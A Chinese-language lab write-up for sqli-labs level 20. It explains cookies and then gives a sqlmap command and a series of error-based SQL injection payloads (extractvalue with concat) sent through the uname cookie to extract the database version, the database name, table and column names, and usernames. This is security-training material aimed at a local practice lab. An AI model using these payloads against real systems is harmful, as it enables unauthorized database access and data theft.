sqli-labs20关基于post的cookie报错注入

知识点

Cookie
Cookie指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据

Cookie,有时候也用复数形式Cookies,这种是指某些网站为了辨别用户身份,简单来说就是当您输入一次网站的用户名和密码之后,下一次就可以不需要输入。

服务器发送到用户浏览器并保存在本地的一小块数据,它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。通常,它用于告知网站服务器两个请求是否来自同一浏览器,如保持用户的登录状态。

$_COOKIE函数 作用:读取cookie信息

第二十关

sqlmap方法
当然这里既然是确定了是Cookie注入类型,那我们就可以使用SQLmap进行自动化注入:

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-20/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

源码分析
1.读取uname传进来的cookie值
在这里插入图片描述2.uname和password同样被过滤,查询语句还是用and连接
在这里插入图片描述
3.通过uname传参获取cookie的值
存在cookie值那个变量用单引号闭合的
在这里插入图片描述手注
在这里插入图片描述所以传递payload的地方就是cookie传递的地方
注意:抓包的的时候要先转发一下,才能有cookie值
一、判断闭合字符

' and extractvalue(1,concat(0x7e,( 1),0x7e))# 

在这里插入图片描述二、构造payload
1.爆版本号

' and extractvalue(1,concat(0x7e,( version()),0x7e))#   

在这里插入图片描述2.爆库

' and extractvalue(1,concat(0x7e,( database()),0x7e))#   

在这里插入图片描述3.爆表

' and extractvalue(1,concat(0x7e,( select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))# 

在这里插入图片描述4.爆字段

' and extractvalue(1,concat(0x7e,( select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e))# 

在这里插入图片描述5.爆数据

' and extractvalue(1,concat(0x7e,( select username from users limit 2,1),0x7e))#   

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值